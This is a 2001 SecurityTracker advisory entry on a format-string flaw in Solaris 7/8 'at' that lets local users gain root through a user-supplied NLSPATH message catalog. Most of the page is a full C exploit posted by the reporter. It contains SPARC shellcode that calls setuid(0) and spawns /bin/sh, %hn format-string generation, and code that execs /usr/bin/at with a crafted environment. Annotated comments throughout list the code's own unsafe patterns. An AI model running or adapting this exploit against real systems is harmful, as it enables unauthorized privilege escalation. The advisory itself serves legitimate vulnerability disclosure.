Category:   Application (Generic)  >   At Vendors:   Sun
(Exploit Code is Provided) Re: Solaris at Utility Lets Local Users Gain Root Access
SecurityTracker Alert ID:  1001929
SecurityTracker URL:  http://securitytracker.com/id/1001929
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 5 2001
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): Solaris 7 and 8
Description:   A vulnerability has been reported in the Sun Solaris at command-batch utility that allows local users to gain root-level privileges on the host.

A local user can reportedly create an arbitrary format string in a custom message database that will be fetched by the gettext() function as part of the locale subsystem's internationalization capabilities. The local user can set the NLSPATH environment variable to point to the user-created message database. By using the "at" command [possibly with specific command line arguments], the local user can cause the format string to be executed with root-level privileges. This will happen because gettext() will look for the appropriate translated message to display by following the NLSPATH environment variable, finding the user-created format string in the user-created custom message database.

Impact:   A local user can cause arbitrary shell commands to be executed on the host with root-level privileges.
Solution:   The author of the report indicates that Sun has patched this vulnerability.
Vendor URL:  www.sun.com/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:   UNIX (Solaris - SunOS)

Message History:   This archive entry is a follow-up to the message listed below.
Jun 12 2001 Solaris at Utility Lets Local Users Gain Root Access



 Source Message Contents

Date:  Thu, 5 Jul 2001 18:36:44 +0800
Subject:  Re: "at" is vulnerable on Solaris 7 and 8


Hi all, 

I am sorry for loosely checking
In fact, Sun had the patch before I found this....:p

Here is the exploit...
--
Huang-Yu Wang
hank@aimsecurity.net

--

/*
  NLSPATH, gettext() vulnerable on Solaris/SPARC 7, 8
  by Hank Wang <hank@aimsecurity.net>

  1. use dump mode to dump memory
  2. alignment of shellcode and command arguments
  3. get the address of shellcode and stack skip
  4. return address location is top address - 0x10
  5. run exploit mode with parameters
*/
#include <stdio.h>
/* Default parameters for Solaris/SPARC 7 and 8 (see the header comment);
   each can be overridden on the command line, see mygetopt().
   SHADDR and RETLOC are 32-bit addresses, SKIP a count used by makemo(),
   NOP a 4-byte sequence that main() repeats in front of the shellcode. */
#define SHADDR 0xFFBEFF6C
#define RETLOC 0xFFBEF5BC
#define SKIP 607
#define NOP "\x92\x12\x40\x09"

/* SPARC instruction words of the payload, with the original mnemonics as
   line comments. main() reads this array through a char pointer and appends
   it with strcat(), so the copy ends at the first zero byte, which is the
   final 0x00000000 entry. That assumes a 32-bit build where unsigned long
   is 4 bytes -- TODO confirm (on an LP64 build every element would carry
   4 zero padding bytes and the copy would stop early). */
unsigned long shellcode[]= {
        // setuid 0
        0x901a4009,     // xor %o1, %o1, %o0
        0x82102017,     // mov 0x17, %g1
        0x91d02008,     // ta 8
        // dup2
        0x90102002,     // mov 2,%o0
        0x94102001,     // mov 1,%o2
        0x92102009,     // mov 9,%o1
        0x8210203e,     // mov 0x3e,%g1
        0x91d02008,     // ta 8
        // execve /bin/sh
        0x9422800a,     // sub  %o2, %o2, %o2
        0x9023a008,     // sub  %sp, 8, %o0
        0x210bd89a,     // sethi  %hi(0x2f626800), %l0
        0xa014216e,     // or  %l0, 0x16e, %l0
        0xe023bff8,     // st  %l0, [ %sp + -8 ]
        0x210bdcda,     // sethi  %hi(0x2f736800), %l0
        0xe023bffc,     // st  %l0, [ %sp + -4 ]
        0x9223a010,     // sub  %sp, 0x10, %o1
        0xd023bff0,     // st  %o0, [ %sp + -16 ]
        0xc023bff4,     // clr  [ %sp + -12 ]
        0x8210203b,     // mov  0x3b, %g1
        0x91d02008,     // ta  8
        0x00000000      // terminator: zero word, also ends the C string
};

/* File-scope state written by mygetopt() and read by makemo(), makefile()
   and main(). dump/exploit select the mode (exactly one is set on success);
   shpad/argpad are byte alignments reduced modulo 4 by mygetopt();
   skip, shaddr and retloc default to the #defines above. */
int dump=0, exploit=0;
int shpad=0, argpad=2, skip=SKIP;
unsigned long shaddr=SHADDR, retloc=RETLOC;

/* Print the command-line synopsis to stdout and terminate with status 0.
 * prog: the program name (argv[0]) shown on the first line.
 * Note: exit() is used here without <stdlib.h> being included by the file. */
void usage(char *prog)
{
  static const char *const help[] = {
    "parameters:",
    "\t--skip=<skip stack>",
    "\t--argpad=<num>: alignment of command args",
    "\t--shpad=<num>: alignment of shellcode",
    "\t--shaddr=<shellcode addr>",
    "\t--retloc=<return address location>",
  };
  size_t k;

  printf("%s [dump|exploit] [parameters]\n", prog);
  for (k = 0; k < sizeof help / sizeof help[0]; k++) {
    puts(help[k]);
  }
  exit(0);
}

/* Return the part of opt after pfx when opt starts with pfx, else NULL. */
static const char *opt_value(const char *opt, const char *pfx)
{
  size_t n = strlen(pfx);
  return strncmp(opt, pfx, n) == 0 ? opt + n : NULL;
}

/* Parse the command line into the file-scope globals.
 *
 * argv[1] selects the mode: "dump" sets dump, "exploit" sets exploit; only
 * the first four characters are compared in both cases. Every later
 * argument must be one of --skip=, --shpad=, --argpad=, --shaddr= or
 * --retloc=; shpad and argpad are reduced modulo 4, shaddr and retloc are
 * parsed as hexadecimal. Returns 1 on success and -1 on an unrecognised
 * mode or option. argc is assumed to be at least 2 (main() checks this).
 * Malformed numbers are silently taken as 0 by atoi()/strtoul(). */
int mygetopt(int argc, char **argv)
{
  const char *val;
  int idx;

  if (strncmp(argv[1], "dump", 4) == 0) {
    dump = 1;
  } else if (strncmp(argv[1], "exploit", 4) == 0) {
    exploit = 1;
  } else {
    return -1;
  }

  for (idx = 2; idx < argc; idx++) {
    if ((val = opt_value(argv[idx], "--skip=")) != NULL) {
      skip = atoi(val);
    } else if ((val = opt_value(argv[idx], "--shpad=")) != NULL) {
      shpad = atoi(val) % 4;
    } else if ((val = opt_value(argv[idx], "--argpad=")) != NULL) {
      argpad = atoi(val) % 4;
    } else if ((val = opt_value(argv[idx], "--shaddr=")) != NULL) {
      shaddr = strtoul(val, NULL, 16);
    } else if ((val = opt_value(argv[idx], "--retloc=")) != NULL) {
      retloc = strtoul(val, NULL, 16);
    } else {
      return -1;
    }
  }
  return 1;
}

/* Generate the message catalog that the at(1) process will load.
 *
 * Writes foo.po containing one msgid (presumably a message that at(1)
 * passes to gettext() -- not verifiable from this file) and a msgstr built
 * below, then runs msgfmt to compile it into SUNW_OST_OSCMD in the current
 * directory, which main() places on NLSPATH. In dump mode the msgstr is a
 * run of %08x conversions; in exploit mode it is a run of zero-padded width
 * conversions followed by two %hn conversions, with widths derived from
 * shaddr and skip. Reads the globals skip, exploit and shaddr.
 *
 * Review notes: fopen() is unchecked, so a NULL fp reaches fprintf();
 * msg is a fixed 4096-byte buffer grown with unchecked strcat(), so a large
 * --skip overflows it; pattern[16] assumes the width values fit in a few
 * digits; msgfmt is run through system() and resolved via the shell's
 * PATH. The str*/memset/system calls are used without <string.h> or
 * <stdlib.h> being included. */
void makemo()
{
  char msg[4096], pattern[16];
  FILE *fp;
  int i, j, r, q;
  unsigned long hw;
  int first, next, last;
  
  /* skip conversions are laid out as q full lines of 8 plus a last line of
     r (1..8); when skip is a multiple of 8 the last full line is used as
     the final line instead of emitting an empty one. */
  r=skip%8;
  r=r?r:8;
  q=skip/8;
  q=(r==8)?q-1:q;

  memset(msg, 0x00, 4096);

  strcpy(msg, "msgstr ");
  if (exploit) {
    /* hw is the low 16 bits of shaddr; first and next are widths chosen so
       that (skip-1)*first + next == hw; last is the high 16 bits minus hw.
       last is an int derived from unsigned long arithmetic and is not
       checked for a negative or out-of-range result. */
    hw=(shaddr & 0x0000ffff);
    first=(hw/skip);
    next=hw-(first*(skip-1));
    last=((shaddr & 0xffff0000) >> 16) - hw;
    sprintf(pattern, "%%0%dx", first);     /* e.g. "%0<first>x" */
    for(i=0; i<q; i++) {
      strcat(msg, "\"");
      for(j=0; j<8; j++) {
        strcat(msg, pattern);
      }
      strcat(msg, "\"\n");
    }
    strcat(msg, "\"");
    for(j=0; j<r-1; j++) {
      strcat(msg, pattern);
    }
    sprintf(pattern, "%%0%dx", next);      /* final width of the run */
    strcat(msg, pattern);
    strcat(msg, "\"\n");

    /* closing line: %hn, a conversion of width last, %hn */
    strcat(msg, "\"");
    strcat(msg, "%hn");
    sprintf(pattern, "%%0%dx", last);
    strcat(msg, pattern);
    strcat(msg, "%hn");
    strcat(msg, "\"\n");
  }
  else {
    /* dump mode: skip %08x conversions, 8 per line, each line newline-
       terminated inside the msgstr */
    for(i=0; i<q; i++) 
      strcat(msg, "\"%08x %08x %08x %08x %08x %08x %08x %08x\\n\"\n");
    strcat(msg, "\"");
    for(i=0; i<r-1; i++)
      strcat(msg, "%08x ");
    strcat(msg, "%08x");
    strcat(msg, "\\n\"\n");
  }

  fp=fopen("foo.po", "w");   /* unchecked: NULL on failure */

  fprintf(fp, "%s\n", "msgid \"commands will be executed using %s\\n\"");
  fprintf(fp, "%s", msg);
  fclose(fp);

  /* compile the .po into the catalog file; relies on msgfmt being on PATH */
  system("msgfmt -o SUNW_OST_OSCMD foo.po");
}

/* Build the name of the file passed to `at -f` and create it with touch.
 *
 * file: caller-provided buffer (main() passes a zeroed char[20]). On return
 * it holds argpad pad bytes, the 4 raw bytes of retloc+2, "AAAA", the 4 raw
 * bytes of retloc, then 4-argpad pad bytes -- at most 18 bytes plus the
 * terminator when argpad is in 0..3. The two addresses are copied straight
 * from their in-memory representation, so they appear in host byte order
 * and a zero byte inside either value cuts the copy short.
 *
 * Review notes: declared int but has no return statement (the caller
 * ignores the value); cmd[64] is filled without a length check, though it
 * fits given main()'s 20-byte buffer; the file name goes through system(),
 * i.e. through the shell. strncat/strcat/strcpy/system are used without
 * <string.h>/<stdlib.h> being included. */
int makefile(char *file)
{
  unsigned long high, low;
  char *p;
  char cmd[64];
  
  /* retloc and retloc+2: presumably the two targets of the %hn pair that
     makemo() emits -- not verifiable from this file */
  high=retloc+2;  
  low=retloc;

  strncat(file, "AAAA", argpad); 
  p=(char *)&high;
  strncat(file, p, 4);      /* raw bytes of high, stops early at a zero byte */
  strcat(file, "AAAA");
  p=(char *)&low;
  strncat(file, p, 4);      /* raw bytes of low, same caveat */
  strncat(file, "AAAA", 4-argpad);
  strcpy(cmd, "touch ");
  strcat(cmd, file);
  system(cmd);
}

/* Entry point.
 *
 * Usage: prog dump|exploit [--skip=N] [--shpad=N] [--argpad=N]
 *        [--shaddr=HEX] [--retloc=HEX]
 * Parses the options into the globals, prints the effective parameters,
 * generates the message catalog (makemo) and the at(1) input file
 * (makefile), then builds the EGGSHELL environment variable and execs
 * /usr/bin/at with an environment of just EGGSHELL and NLSPATH, so that
 * at(1)'s catalog lookup can find the generated file in the current
 * directory.
 *
 * Review notes: declared int but has no return statement; the printf uses
 * %08x for unsigned long arguments (a mismatch on LP64 builds); the
 * execle() return value is not checked, so a failed exec falls off the end
 * of main; exit/memset/strcpy/strcat/strncat/execle are used without
 * <stdlib.h>/<string.h>/<unistd.h> being included. */
int main(int argc, char *argv[])
{
  char *prog;
  char file[20];                 /* filled by makefile() */
  char eggshell[128];            /* "EGGSHELL=" + pad + NOPs + shellcode + pad */
  char nlspath[]="NLSPATH=:.";   /* presumably adds the current directory to the catalog search -- confirm */
  int i;
  char *p=(char *)&shellcode;    /* shellcode viewed as a byte string */
  char *env[3]={eggshell, nlspath, NULL};  /* the entire environment for at */

  prog=argv[0];
  if(argc < 2) {
    usage(prog);                 /* usage() exits */
  }
  if (mygetopt(argc, argv)==-1) {
    usage(prog);
  }
  printf("skip=%d, shaddr=0x%08x, retloc=0x%08x\n", skip, shaddr, retloc);
  fflush(stdout);

  makemo();
  memset(file, 0x00, 20);
  makefile(file);

  /* EGGSHELL: shpad alignment bytes, four NOPs, the shellcode bytes up to
     their terminating zero word, then the remaining alignment bytes */
  memset(eggshell, 0x00, 128);
  strcpy(eggshell, "EGGSHELL=");
  strncat(eggshell, "AAAA", shpad);
  for(i=0; i<4; i++)
    strcat(eggshell, NOP);
  strcat(eggshell, p);
  strncat(eggshell, "AAAA", 4-shpad);


  /* -t 07010100 is a fixed job time; on success this call does not return */
  execle("/usr/bin/at", "at", "-f", file, "-t", "07010100", NULL, env);
}




 
 

